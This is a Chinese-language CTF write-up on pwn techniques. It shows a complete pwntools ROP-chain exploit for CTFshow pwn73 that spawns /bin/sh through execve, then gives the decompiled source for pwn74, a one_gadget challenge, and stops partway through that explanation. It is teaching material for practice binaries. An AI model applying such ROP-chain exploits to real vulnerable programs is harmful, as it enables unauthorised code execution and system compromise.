Ropchain

一把梭工具，非常好用，比较简单就不介绍了

eg：CTFshow pwn73

from pwn import *
from struct import pack
io=process("./pwn73")
# Padding goes here
p = cyclic(0x18+4)
p += pack('<I', 0x0806f02a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b81c6) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806f02a) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b81c6) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806f02a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08049303) # xor eax, eax ; ret
p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de955) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806f02a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08049303) # xor eax, eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0806cc25) # int 0x80
io.recvuntil("hand!!\n")
io.sendline(p)
io.interactive()

one_gadget

eg：ctfshow pwn74

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v4[3]; // [rsp+8h] [rbp-18h] BYREF

  v4[2] = __readfsqword(0x28u);
  init(argc, argv, envp);
  puts(s);
  puts(asc_A80);
  puts(asc_B00);
  puts(asc_B90);
  puts(asc_C20);
  puts(asc_CA8);
  puts(asc_D40);
  puts("    * *************************************                           ");
  puts(aClassifyCtfsho);
  puts("    * Type  : PWN_Tricks                                              ");
  puts("    * Site  : https://ctf.show/                                       ");
  puts("    * Hint  : Use one_gadget a shuttle!                               ");
  puts("    * *************************************                           ");
  printf("What's this:%p ?\n", &printf);
  __isoc99_scanf("%ld", v4);
  v4[1] = v4[0];
  ((void (*)(void))v4[0])();
  return 0;
}

这个题是NX，PIE，canary保护全开的，打印了printf的地址

这个题我们不想需要栈溢出，因此canary保护可有可无，而PIE就要求我们libc了